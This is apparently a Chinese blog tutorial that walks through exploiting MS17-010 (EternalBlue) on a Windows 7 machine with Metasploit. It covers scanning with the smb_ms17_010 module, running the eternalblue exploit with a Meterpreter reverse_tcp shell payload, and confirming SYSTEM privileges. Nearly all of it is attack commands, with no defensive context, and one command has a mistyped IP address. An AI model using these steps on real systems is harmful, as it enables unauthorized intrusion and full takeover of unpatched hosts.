共计 748 个字符,预计需要花费 2 分钟才能阅读完成。
信息收集
MS17_010 漏洞利用,通过扫描确认网络中 192.168.1.123 计算机 445 端口处于开启状态
探测漏洞是否可用
进入 msf 交互控制台
msfconsole
搜索相关的攻击辅助模块以及攻击模块
search ms17
加载扫描检测漏洞辅助模块
use auxiliary/scanner/smb/smb_ms17_010
查看需要设置的参数,如下参数为 rhost(目标 IP)
设置被检测目标机器 rhost 192.68.1.123
run
返回
Host is likely VULNERABLE to MS17-010! – Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
译文:主机很可能容易受到 MS17-010 的!-Windows 7 终极 7601 服务包 1 ×64(64 位)
此时,确认该漏洞可用
开始攻击
选择攻击模块 use exploit/windows/smb/ms17_010_eternalblue
use exploit/windows/smb/ms17_010_eternalblue
查看需要设置的参数,如下参数为 payload(攻击载荷),rhost(目标 IP)
show options
设置参数攻击载荷:set payload windows/x64/meterpreter/reverse_tcp
set payload windows/x64/meterpreter/reverse_tcp
目标 IP:set rhosts 192.168.1.123
<pre class="wp-block-code">```
set rhosts 192.168.1.123
开始攻击
exploit
当出现 =-=-=-WIN=-=-=- 就代表已成功拿到权限
提升权限
getuid
此刻已拿到该计算机的 system 权限
持续关注!!!
正文完